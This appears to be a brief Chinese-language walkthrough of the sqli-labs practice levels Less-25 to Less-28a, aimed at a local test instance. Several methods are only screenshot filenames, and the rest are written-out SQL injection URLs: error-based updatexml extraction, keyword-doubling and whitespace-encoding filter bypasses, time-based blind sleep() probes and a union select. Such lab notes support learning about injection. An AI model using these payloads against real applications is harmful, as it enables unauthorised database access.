less-25

方法一:
1643043972(1).png
方法二:(报错注入)
http://127.0.0.1/sqli-labs-master/Less-25/?id=-1’ || updatexml(1,concat(0x7e,(database())),1) || ‘1’=’1

less-25a

方法一:http://127.0.0.1/sqli-labs-master/Less-25a/?id=1 oorrder by 3
方法二:
1643045116(1).png

less-26

方法一:
1643794471(1).png
方法二:
1643795991(1).png

less-26a
1643851390(1).png

less-27
1643853341(1).png

1643853816(1).png

less-27a
1643854640(1).png

时间盲注:
http://127.0.0.1/sqli-labs-master/Less-27a/?id=1” %26%26 if(length(database())>1,1,sleep(5))%26%26%09”1”=”1

less-28
1643856191(1).png
1643856867(1).png

也可以使用时间盲注

less-28a
联合查询
http://127.0.0.1/sqli-labs-master/Less-28a/?id=1’)) %a0UniOn %a0SelEct%a0 1, 2,3—+
时间盲注
http://127.0.0.1/sqli-labs-master/Less-28a/?id=1’)) %09 and %09 if(length(database())>1,1,sleep(5))—+